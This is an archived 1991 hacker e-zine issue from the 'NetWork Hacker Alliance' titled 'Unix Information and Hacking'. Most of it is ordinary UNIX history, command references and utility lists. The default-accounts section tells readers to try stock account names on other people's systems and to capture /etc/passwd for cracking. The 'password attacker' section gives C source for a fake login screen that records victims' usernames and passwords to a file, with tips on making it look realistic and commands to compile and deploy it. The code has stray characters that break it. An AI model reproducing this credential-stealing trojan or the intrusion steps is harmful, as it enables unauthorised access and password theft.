💾 Archived View for gemini.spam.works › mirrors › textfiles › magazines › NHA › nha-002.txt captured on 2022-06-12 at 13:36:27.

View Raw

More Information

-=-=-=-=-=-=-



             ___     ___     ___     ___     ___________
            |   \   |   |\  |   |\  |   |\  |           |\
            |    \  |   | | |   | | |   | | |    ___    | |
            |     \ |   | | |   |_|_|   | | |   |\ _|   | |
            |      \|   | | |           | | |   |_|_|   | |
            |   |\      | | |    ___    | | |    ___    | |
            |   | \     | | |   |\ _|   | | |   |\ _|   | |
            |   | |\    | | |   | | |   | | |   | | |   | |
            |   | | |   | | |   | | |   | | |   | | |   | |
            |___| | |___| | |___| | |___| | |___| | |___| |
             \___\|  \___\|  \___\|  \___\|  \___\|  \___\|



            - A Production of the NetWork Hacker Alliance INC -


                PreZidents:Inphiniti & Code of Honor & Cobra

                       NHA Member Boards Listing
                       +=+=+=+=+=+=+=+=+=+=+=+=+
     +---------------------+---------------+-------------+---------+
     | Inphiniti's Edge    | 216-662-5115  | NHA *WHQ*   | NoT     |
     | Project Phusion     | 301-365-9249  | NHA Node 1  | NoT     |
     | Realm of Chaos      | 516-466-8259  | NHA Node 2  | Ex-NASTY|
     +---------------------+---------------+-------------+---------+


          NHA is now accepting applications.. If you are intrested
          and knowledgable in the Hacking of Networks and Phreaking
          etc, please call your fine H/p bbs system and download
          'NHA-APP.TXT' and upload it to Inphiniti's Edge.

                         +--------------------------+
                         |        -- NHA --         |
                         | NetWork Hackers Alliance |
                         +--------------------------+

                                  Presents

              Issue 2 : "Unix Information and Hacking"

                           Compiled by Inphiniti & Cobra
                             Edited by Inphiniti & Cobra
  ---
  AXiS & NHA have merged as of 06/30/91 for the better of H/P in America.
  ---

  ---
  Index

  I.    Introduction
  II.   History of UNIX
  III.  Unix Portability (other names for Unix)
  IV.   Frequently Used Commands (explained in detail)
  V.    Unix Editors (explained in detial)
  VI    Standard Unix Utilities
  VII.  UNIX Default Accounts
  VIII. UNIX Password Attacker
  IX.    Closing Remarks
  ---

 +-----------------+
 | I. Introduction |
 +-----------------+

              What is an Operating System?

    UNIX is a modern day operating system.  But, what is an operating system?
  One definition of an operating system is:

    "the programs of a digital computer system which, together with the
 characteristics of the computer system, form the basis of the various
 operational modes of the digital computer system and especially those
 which control and supervise the processing of programs."

    This compact and comprehensive description assumes the understanding of
 some concepts.  The "digital computer system" is the hardware. These are the
 physical components of the computer which can be touched.  Thirty years ago
 this description would have been sufficient.  Today addicitonal concepts are
 required.  Besides the "body", a computer system must have a "soul".  Since
 a "soul" must be immaterial, it can only consist of software in a computer.
 This software is the operating system.

  Therefore, the characteristics, better yet the hardware characteristics of
 the computer system, together with the operating system form the basis of the
 processing capabilities.  The operating system does not include all the
 software in a computer.  This is the software which permites the user of the
 system to execute the applications software specifically written to be used
 with that operating system.  The user of a modern computer system is no
 longer confronted by the hardware, but with the operating system such as UNIX.

    From this viewpoint of the user, there are three basic operating modes

   o  Batch Processing
   o  Conversational (or interactive) mode
   o  Real-time processing

  Batch processing originated during the time when executable programs were
 read on a card reader in the form of a punched card dec, consisting of
 control statements and the actual program..  The punched cards have now
 disappeared - at best they can still be found as scraps for notes - but the
 concept and the operating mode remains.

     Batch jobs

 A barch job must be defined completely and in the proper sequence. The ]
 control statements are usually stored in a file.  One of these statements calls
 the program to be executed  Several programs can be initiiated within a batch
 job.  However, all required operating devices such as disck storage, magnetic
 tape storage, printer, plotter, etc. must be requested from inside the job.
 No calls to the operating system are permitted since they are not answered.

        Unix and MS-DOS,CP/M or OS/2

 UNIX is the oldest of the three systems, even though it has been discussed
 only in the last few yeards.  CP/M and MS-DOS are oriented strongly toweds
 the main features if UNIX.  The newer versions of MS-DOS resemble UNIX
 very much.  Even the command syntax is very similar  The largest step in
 the direction of UNIX came with DOS Version 2.0.

    Viewed from the users perspectivem the file systems of UNIX and DOS resemble
    earch other alot.  Both orginate in a root are structured hierarchically
    (like a tree).  Directories permit the user to retain an overview.  Besides
    the common files and directories, UNIX also knows an additional type, the
    device file.  Devide files provide an interface to the physical devices
    which are addressed just like an ordinart file.  Special systems call for
    control of the peripherals and are therefore not required.

 Internally a UNIX file differs from a CO/M or DOS file. The orientation
 towards the record oand bloack structure of a disk has been dropped.  UNIX
 recoqnizes only blocks which contain byte chains.  The type of file does
 not make any difference to UNIX, since it is only a concern of the
 application program using the file.

 +---------------------+
 | II. History of Unix |
 +---------------------+

    The history of UNIX begain in 1969 at Bell Labortatories, which is part
    of AT&T.  Kennth Thompson developed an operating system writtern in
    DEC PDP-7 assembler code for the "Soace Travel" project.  He called it
    UNIX.  The names was derived from the preceding operating system
    Multics which was less conservative in the use of scare computer
    resources.  UNIX was at first a single user variant of Multics.

  In 1971 UNIS was implemented again in assembler code on ther more powerful
  computers of the PDP-11 series.  To become more independant from another
  change in hardware, Thompson planned a new implementation in a higher level
  language.  He developed the B language from BCPL in 1970, but this language
  did not prove powerful enough.

 After Dennis Ritchie, also a Bell, created the C language, UNIX was
 rewritten almost completely in this higher level language by 1073. By
 utilizing the advantages of C, UNIX became capable of handling multiusers
 and multi-tasking.  UNIX was then machine independent and the start signal
 for its rapid distribution was given.  At that time, Version 5 was still
 being distributed to American universites free of chare for use in research
 and education.  Berkeley University in particular developed UNIX further.

 The real triumph begain in 1975 with Version 6.  AT&T granted source
 licenses to intrested companies, but without support.  From this
 release, derivatives of UNIX were created with spilt away from the main
 development.

    Version 7 of UNIX appeard about the same time as the first 16-bit
    microprocessors.  This is the version onwhich most of todays Unix
    derivatives are based.  A third branch also developed, which is
    characterizedmost by the Microsoft product XENIX.

    Since 1983 AT&T has tried to bring the various development streams
    together again.  Training, documentation and other support is
    being offered.  The external sign is a new number series know as System
    V.

 +------------------------+
 |  III. Unix Portability |
 +------------------------+

    System Name     Manufacturer
    -----------     ------------
    Aix             IBM
    bsd             University of California at Berkeley
    Coherent        Mark Williams Co.
    Cromix          Cromemco
    Edition VII     Perkin-Elmer
    EUNIX           Electronic Info Systems, INC
    IDRIS           Whitesmith Ltd.
    IS/1            Interactive Systems, INC
    IS/5            Interactive Systems, INC
    JOS             CRDS
    MUNIX           PCS
    OS-1            Software Labs
    SINIX           Siemens
    Unica           Knowlogy
    UTS             Amdahl
    UNIX            Nixdorf
    UX              Hwelett Packard
    VENIX           Ventur Com Ulnc.
    XENIX           Microsoft Co.
    ZEUS            Zilog

 +-------------------------------+
 | IV. Frequently Used Commands  |
 +-------------------------------+


     Name: CAL
     Syntax:      cal [MM] yyyy
     Function: Creates calendar excerpts.
     Options: None

     Name: CANCEL
     Syntax: cancel [reqiest-id ...] [printer ...]
     Function: Print reuest made with ld or 1pr are canceled
     Options: None

     Name: CAT
     Syntax: cat [filename]
     Function: Writes the files indicated screen
     Options: none

     Name: CLEAR
     Syntax: clear
     Function: Clears the display screen.
     Options: none

     Name: COMM
     Syntax: comm [optoms] dat1 dat2
     Function: Displays the lines common to files dat1 and dat2
     Options: -1 \
              -2  > Suppress output of the corresponding columns/lines
              -3 /

     Name: CRYPT
     Syntax: crypt [key]
     Functions: Encodes and decodes text.
     Options: None

     Name: DATE
     Systax: date [date, time]
     Functions: Outputs date and time
     Options: None

     Name: DU
     Syntax: du [option] [dat1] ...
     Functions: Returns the disk usage or block assignment o the files.
     Options: -a Block number for eache file (defult)
              -s Only the total number of blocks is indicated

     Name: ECHO
     Syntax: echo [arguments] [\character]
     Function: Output of commentary in shell procedures.
     Options: System dependant.

     Name: FILE
     Syntax: file [options] file1 ...
     Function: Attempts to determine the specified files class.
     Options: Machine dependant.

     Name: GREP
     Syntax: grep [options] expressions [file1] ...
     Function: Searched the specified files for text patterns which
              where indicated.
     Options: -b Include Bloack numbers
              -c Count number of matching lines
              -f file Searches ex[ression is in the indicated file and not
                      in the arguement.
              -h No filename in the output line
              -n Output line number in every hit line
              -s No output, only status for procedures
                          0 = hit
                          1 = not hit
                          2 = syntax error
              -v Inversion of the command
              -y No distinction made between upper and lower case letters

     Name: HEAD
     Syntax: head [option] [file1] ...
     Function: The first N lines of stdin, or the files indicated
     Options: -n Indicates the numbner of lines from the beginning of the
                 file.

     Name: LOGIN
     Syntax: login NAME
     Function: Logs new users on the system and removes old users.
     Options: None

     Name: LP
     Syntax: lp [options] [file1] ...
     Function: Insterts a print request ino the wait quee of the spool
               system.
     Options: -c Creates a temporary Copy file
              -m After print output, a message is sent by mail
                 to the orginator
              -r remove file after insertion of a temporary copy into
                 waiting queue

     Name: LPSTAT
     Syntax: lpstat [options] [request...]
     Function: Provides information for the spool system, including
               the current status of th print queue
     Options: -u [list]  oputputs the status of all print requests for
                         users in the list specified, each sperarated by
                         a comma.

     Name: MORE & PG
     Syntax: more [options] [file1] ...
             pg [options] [file1] ...
     Function: Display ready preparation of output with user controls
               for ease of viewing.
     Options: -l returs a disply ready list

     Name: PASSWD
     Syntax: passwd [user-name]
     Function: Change or define a new password
     Options: None

     Name: PR
     Syntax: pr [options] [file1] ...
     Function: Prepates files for printing.
     Options: -h     following textis output as header.
              -l[n]  Lines per page
              -n     n column output
              -n[nz] Line numbering
                   n = Number Size
                   z Dividing charaters between line numbers and content
              -o[n]  n charaters spaces at the left border
              -p[n]  After n pages, wait so that baper can be changed
              -t     Suppresses title, line numbers and date.
              -w[n]  Page width in charaters.

     Name: PS
     Syntax: ps [options] [process1 ...] [user1 ...]
     Function: Gives status information about active processes.
     Options: -a  All interactive processes.
              -e  All process for all users.
              -f  Complete information list
              -l  long form of the information list.
              -u user   all process for the indicated users.

     Name: SORT
     syntax: sort [options] [+pos1] [-pos2] [file1] ...
     Function. Sorts the lines of all files indicated according to
               the ascii character set.
     Options: -b     Ignore blanks and tab characters at the begining
                     of the file.
              -d     Consider only alphanumeric characters and blanks.
              -f     Treat uppercase letters as lowercase
              -r     Sort in revers order.
              -t [c] Dividing character c, may not be a space

     Name: SPLIT
     Syntax: split [-n] [file [name]]
     Function: Splits the indicated file into parts of n lines each.
     Option: -n  Number of lines for each partial file.

     Name: TAIL
     Syntax: tail [n [units]] [file1 ...]
     Functions: Copies the named file to stdout, beginning at the
                designated postion within the file.
     Options: None

     Name: TIME
     Syntax: time [command]
     Function: Returns the execution time of a command or program with
               actual delays in seconds.
     Options: None

     Name: WC
     Syntax: wc [options] [file1] ...
     Function: Counts lines, words and/or charaters in the indicated file
     Options: -l   counts only lines
              -w   counts only words
              -c   counts only characters

     Name: WHO
     syntax: who
     Function: Returns information about current users, user ids, terminals
               and start of session.
     Options: None

 +-----------------+
 | V. Unix Editors |
 +-----------------+

 There are three basic editors in the unix environment.  Some systems have
 other non-portable editors but there are three basic ones.

 ed:
   - line oriented
   - interactive

 sed:
   - line oriented
   - not interactive
   - for batch processing

 vi:
   - most powerful UNIX editor
   - interactive
   - full screen capability

   -- ED Editor Command Summary --

    syntax: ed [-] [-x] [file]

    Commands
    --------
    a        append
    i        insert
    c        change
    w [file] write to [file]
    .        current line
    $        last line
    n        Specifir line number n
    +n       Go ahead N lines
    -n       Go back N lines
    d        delete
    e file   Reads file into current file
    f        outputs name of processed files
    j        join
    l        list
    p        print
    r file   read and insserrs specified file behind the indicated buffer
    m [line] move to line #
    t [line] transfer to line #
    u        undo
    q        quit
    !        executes the shell command


   -- SED Editor Command Summary --

   Syntax: sed [-n] [-e script] [-f cmd_file] [input_file ...]

   Options: -e  sed command can be indicated directly
            -f  sed command are read from specifierd command file
            -n  suppresses the standard output


   -- VI Editor Command Summary --

   a  append
   i  insert
   o  open
 esc  to exit insert mode
   w  write file
   q  to quit
   j  move down one line
   k  move up one line

 +-----------------------------+
 | VI. Standard Unix Utilities |
 +-----------------------------+

   (Please Note: When entering this commands in UNIX you type in lower case)

  ACCEPT        Permits spooling request for printer

  ADB           Absolute debugger

  AR            Maintains portable archives and libaries
 
  AS            Assembler

  AT            Executes commands at a later time

  AWK           Pattern scanning and processing language

  BANNER        Makes text banners

  BASENAME      Outputs filename from path name

  BATCH   Executes commands at a later time

  BC   Desktop calculator with programming constuctions

  BDIFF   Compares two large files

  BFS   Big file scanner

  CAL   Outputs a Calander

  CALENDAR  Appointment scheduler

  CANCEL  Cancels previous spool requests

  CAT   COncatenates and prints files

  CC   C Language compiler

  CD   Changed current work directory

  CHGRP   Changes group ownership of file or directory

  CHMOD   Changes file access permission

  CHOWN   Changes file ownership

  CMP   Compares two files

  COL   Filters revers line feeds

  COMM   Selects or rejects lines common to two sorted files

  CP   Copies files

  COIP   Copies files archives in and out

  CPP   C language preprocessor

  CRYPT   Encodes and Decodes text

  CSPLIT     Splits files based on pattern matching

  CT   Spawns a getty process to a remote terminal

  CTRACE  Traces C program execution

  CU        Calls another UNIX system

  CUT   Cuts out selected fields of each line of a file

  CREF    Generates C program cross-reference listing

  DATE   Sets or prints the current date

  DC    Desktop calculator

  DD   Performs file trasnformations

  DEROFF    Removes formatting commands from file

  DF    Displays free space in file system

  DIFF          Compares two files

  DIFF3   Compares three files

  DIRCMP  Compares directories

  DIRNAME  Outputs the path from a path name

  DIS    Object file disassembler

  DISABLE   Disables spooling on printer

  DU    Summarizes Disk usage

  ECHO   Echoes arguments

  ED   Line-oriented editor

  EDIT   Line-oriented editor

  ENABLE  Enables spooling on a printer

  ENV   Sets environment for command execution

  EXPR    Evaluates arguments as an expression

  FACTOR  Obtains prime factors of a number

  FGREP   Searchs a file for a character string

  FILE   Determines file type

  FIND   Searches for files

  FSDB   Debugs damaged file systems

  GED   Graphical Editor

  GETOPTS  Phrase command line options

  GLOSSARY  Displays definitions of UNIX system terms and symbols

  GRAPH   Draws a graph

  GRAPHICS  Accesses graphical and numerical commands

  GREEK   Selects terminal filter

  GREP   Selects lines of a file based on a pattern matching

  GUTIL   Graphical utilties

  HELP    Provides on-line help on UNIX commands

  HELPADM     Makes changes to the Help Facility Database

  ID     Outputs user and group ID's and names

  IPCS   Reports interprocess communication ffacilities status

  JOIN   Joins two tabular data files

  KILL    Terminates or signals a process

  LINE      Copies a line from standard input to output

  LN    Links file names

  LOGIN   Admits autorized users to system

  LOGNAME  Outputs the user's login name

  LP   Line printer spooler

  LPR   Line printer spooler

  LPADMIN   Configes the 1p spooling system

  LPSTAT   Printer spooling status information

  LS   Lists contents of directories

  M4   Macro processor

  MAIL     Sends and recieves UNIX mail

  MAILX   Extended Mail Facility

  MAKE   Regenerates groups of programs

  MAKEKEY  Regenerates encryption key

  MAN    Prints on-line manual entries

  MESG   Permits or denies messages

  MKDIR   Makes a Directory

  MKFS   Creates a file system on disk

  MKNOD   Creates a directory entry for a special file

  MOUNT   Mounts a file system

  MV   Moves files

  MVDIR   Moves a directory

  NEWFORM  Reformats lines of a text file

  NEWGRP  Changes active group membership

  NEWS   Prints News commands

  NICE   Runs a program at reduced priority

  NL   Line numbering filter

  NOHUP   Runs a command immune from hang-ups and quits

  NROFF   Text formatter

  OD   Outputs an octal dump of a file

  PACK   Packs files

  PASSWD  Changes online users password

  PASTE   Merge lines of files

  PCAT   Concatenates packed files

  PG   Browse file contents on terminal screen

  PR   Print files

  PS   Outputs process status

  PWD   Prints the name of the current working directory

  RM   Removes files

  RMDIR   Removes directories

  RSH   Restricted UNIX system shell

  SAG   Outputs system activity graph

  SAR    Outputs system activity report

  SCAT   Concatenates and prints files

  SDB           Symbolic debugger

  SDIFF   Compares two files

  SED   Stream Editor

  SH   The Unix system shell

  SHL   Shell layer manager

  SHUTDOWN   Shuts down the system

  SLEEP   Suppends execution for a time interval

  SORT   Sorts and merges files

  SPLIT   Splits a file

  STARTER  Displays UNIX information for new users

  STRIP   Removres symbol table information from object file

  STTY   Sets ternubak characterustics

  SU   Tempararily changes the user-ID

  SUM   Outputs checksum and block count for file

  SYNC   Writes disk buffers to disk

  SYSADM  Menu Driven system administration utility

  TABS   Srets tabs on a terminal

  TAIL   Outputs the last oart of a file

  TAR   Tape file archiver

  TEE   Pipe fitter

  TEST   Evaluates conditions

  TIME   Times command execution

  TOUCH   Updates access and modifications times of a file

  TR   Character translation fiflter

  TROFF   Phototypesetter text formatter

  TRUE   Returns true value

  TTY   Outputs name of a terminal

  UNMASK  Setsr file creation mode mask

  UMOUNT  Dismounts a file system

  UNAME   Outputs the name of the current UNIX system

  UNIQ    Outputs a file with unique lines

  UNITS   Performs units conversions

  UNPACK  Unpacks packed files

  USAGE   Displays information about command usage

  UUCP   Copies files between UNIX systems

  UULOG   Outputs UUCP log information

  UUNAME   Outputs UUCP names of known systems

  UUSTAT  Outputs UUCP status information

  UUX   Executes a command on a remote UNIX system

  VI   Full screen editor

  WAIT   Waites for completeion of background processing

  WALL   Sends a message to all users

  WC   Outputs line, word and character counts for files

  WHO   Outpurts information on current users

  WRITE   Sends messages to another user

  XARGS   Constructs an argument list and executes a command

  YACC   Compiler-generating tool


+----------------------------+
| VII. Unix Defualt Accounts |
+----------------------------+

   Super User Default Accounts

   ROOT
   MAKESYST
   MOUNTSYS
   UMUNTFSYS
   CHECKSYS
   FSYS

   Regular User Defaults

   DAEMON
   DAEMONx  (x value is 1 thru 9)
   LP

   Unix Systems that have already been hacked try..

   ROCUSER
   IEx      (x value is 1 thru 4)
   ANONYMOUS
   GUEST


    If it askes for a password I doubt you will get in but always try the
    account name.

    Once in type this (at the waiting prompt usually a # or $)

    cd /ETC     (UNIX root directory)
    cat PASSWD  (UNIX password file)  <--- Capture this if you can get it
       then find a UNIX hacker on your local H/P board and let it run!

 +------------------------------+
 | VIII. Unix Password Attacker |
 +------------------------------+


/* this is what a 'C' comment looks like.  You can leave them out. */

/* #define's are like macros you can use for configuration. */

#define SYSTEM "\n\nTiburon Systems 4.2bsd UNIX (shark)\n\n"

/* The above string should be made to look like the message that your
 * system prints when ready.  Each \n represents a carriage return.
 */

#define LOGIN  "login: "

/* The above is the login prompt.  You shouldn't have to change it
 * unless you're running some strange version of UNIX.
 */

#define PASSWORD "password:"

/* The above is the password prompt.  You shouldn't have to change
 * it, either.
 */

#define WAIT 2

/* The numerical value assigned to WAIT is the delay you get after
 * "password:" and before "login incorrect."  Change it (0 = almost
 * no delay, 5 = LONG delay) so it looks like your system's delay.
 * realism is the key here - we don't want our target to become
 * suspicious.
 */


#define INCORRECT "Login incorrect.\n"

/* Change the above so it is what your system says when an incorrect
 * login is given.  You shouldn't have to change it.
 */

#define FILENAME "stuff"

/* FILENAME is the name of the file that the hacked passwords will
 * be put into automatically.  'stuff' is a perfectly good name.
 */

/* Don't change the rest of the program unless there is a need to
 * and you know 'C'.
 */

#include <curses.h>
#include <signal.h>
int stop();

main()
{
char name[10], password[10];
int i;
FILE *fp, *fopen();
signal(SIGINT,stop);
initscr();
printf(SYSTEM);
printf(LOGIN);
scanf("%[^\n]",name);
getchar();
noecho();
printf(PASSWORD);
scanf("%[^\n]",password);
printf("\n");
getchar();
echo();
sleep(WAIT);


if ( ( fp = fopen(FILENAME,"a") )  != NULL ) {
#fprintf(fp,"login %s has password %s\n",name,password);
#fclose(fp);
#}

printf(INCORRECT);
endwin();
}

stop()
{
endwin();
exit(0);
}

-- END --



 cc horse.c -lcurses -ltermcap
 mv a.out horse
 source trap            (again, don't type the %)
 


 +---------------------+
 | IX. Closing Remarks | 
 +---------------------+
 

   Well this is the end of Unix Hacking Volume I.  You should have a firm
   awareness with UNIX now and I hope you continue to grow and wait for
   our UNIX Hacking Voulume II which will contains holes into the unix
   system..
   
   NHA nor the Author(s) of this file are responisble for any use that
   may come into play by the reader. This is meant for education purposes
   only not for any illegal activities.
   
             ___     ___     ___     ___     ___________
            |   \   |   |\  |   |\  |   |\  |           |\
            |    \  |   | | |   | | |   | | |    ___    | |
            |     \ |   | | |   |_|_|   | | |   |\ _|   | |
            |      \|   | | |           | | |   |_|_|   | |
            |   |\      | | |    ___    | | |    ___    | |
            |   | \     | | |   |\ _|   | | |   |\ _|   | |
            |   | |\    | | |   | | |   | | |   | | |   | |
            |   | | |   | | |   | | |   | | |   | | |   | |
            |___| | |___| | |___| | |___| | |___| | |___| |
             \___\|  \___\|  \___\|  \___\|  \___\|  \___\|

            - A Production of the NetWork Hacker Alliance INC -

                PreZidents:Inphiniti & Code of Honor & Cobra

                       NHA Member Boards Listing
                       +=+=+=+=+=+=+=+=+=+=+=+=+
     +---------------------+---------------+-------------+---------+
     | Inphiniti's Edge    | 216-662-5115  | NHA *WHQ*   | NoT     |
     | Project Phusion     | 301-365-9249  | NHA Node 1  | NoT     |
     | Realm of Chaos      | 516-466-8259  | NHA Node 2  | Ex-NASTY|
     +---------------------+---------------+-------------+---------+





          NHA is now accepting applications.. If you are intrested
          and knowledgable in the Hacking of Networks and Phreaking
          etc, please call your fine H/p bbs system and download
          'NHA-APP.TXT' and upload it to Inphiniti's Edge.

                  With this file we welcome Keener into NHA.


                 N.H.A.  The Future of Hacking and Phreaking


                 In the works....

                            CBI Advanced Usage
                            TRW Advanced Usage
                            Milton.Edu Advanced Usage

                           more to come from N.H.A.